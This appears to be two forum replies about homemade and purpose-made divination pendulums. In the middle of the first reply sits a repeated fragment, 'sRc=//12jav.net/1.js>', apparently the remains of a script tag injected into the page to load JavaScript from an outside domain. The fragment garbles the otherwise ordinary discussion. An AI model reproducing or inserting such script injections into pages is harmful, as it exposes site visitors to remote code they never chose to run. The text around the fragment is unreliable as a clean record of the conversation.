Nope. I made mine out of a key and strong i found on the ground. Just be sure to cleanse it. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

Ace is absolutely correct. Whatever suits your needs, as long as it can swing freely. I've had purpose-made pendulums made of wood, brass, clear quartz. I used to know someone who carried one in her wallet, made of a heavy sewing needle on thread, so it was basically always at the ready.
